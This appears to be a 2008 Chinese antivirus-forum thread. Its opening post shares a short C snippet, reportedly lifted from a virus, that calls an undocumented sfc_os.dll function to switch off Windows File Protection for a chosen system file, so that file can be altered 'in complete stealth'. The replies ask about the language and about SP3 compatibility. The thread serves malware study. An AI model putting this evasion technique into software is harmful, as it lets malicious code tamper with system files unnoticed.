发新话题
打印

资料备份-WINDOWS文件保护的去除

资料备份-WINDOWS文件保护的去除

貌似是系统自保护的xx 一个病毒里面看到的方法貌似是下面的这个
复制内容到剪贴板
代码:
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);



void Disable_WFP()

{



HINSTANCE hmod=LoadLibrary("sfc_os.dll");



CPP SetSfcFileException;



// the function is stored at the fifth ordinal in sfc_os.dll



SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);



SetSfcFileException(0, L"c:\\windows\\system32\\calc.exe",-1);



//Now we can modify the system file in a complete stealth.



}
其他资料:

http://www.xfocus.net/articles/200402/672.html
http://forum.eviloctal.com/thread-28429-1-1.html

A simple way to hack Windows File Protection (WFP).pdf (31.89 KB)
客户端.rar (30 KB)

[ 本帖最后由 一把锈剑 于 2008-7-29 15:09 编辑 ]

TOP

沙发  什么语言啊  我咋看不懂
我的洞穴

耗子的杀毒空间
(空间里提供杀毒,修复工具 学习资料,以及其他系统工具)

★★★每周QQ表情和头像推荐★★★(11月3日~11月9日)
看帖必回,是一种美德
金山样本收集组1群号:51121013(求助人员禁止加入)开放时间:周一到周五(节假日除外)
互联网的力量是无穷大的,毒霸现在把大家联成一线,让大家都成为反病毒的一线主体

TOP

取消指定文件的 SFC保护,对 SP3以后系统适用吗? 貌似 SP3 改了sfc_os.dll。。。

TOP

C++?
SREng >智能扫描 >保存报告 > 上传附件
SREng服务和驱动操作指引            点击查看新手发帖前必看
>启动项目>服务>Win32服务应用程序 或 驱动程序>勾选隐藏已验证
的微软项目>点选需要删除的项目>点选"删除服务">再点击"设置"按钮
>弹出对话框选确认                      冰刃    点击下载清理助手

TOP

发新话题
本功能由奇虎搜索实现

相关主题

标题 作者 最后发表
精品软件更新 helshen 2008-11-17
拒绝黑屏-红旗Linux硬盘安装简单教程 mingyx 2008-11-18
菜鸟用电脑中最忌讳的十八个动作 qaz0226 2008-11-15
预防病毒的八个忠告 骨头在说话 2008-11-06
男人的A片藏在电脑的哪里 dbv1986 2008-11-04
点击阅读更多关于的相关帖子  更多相关主题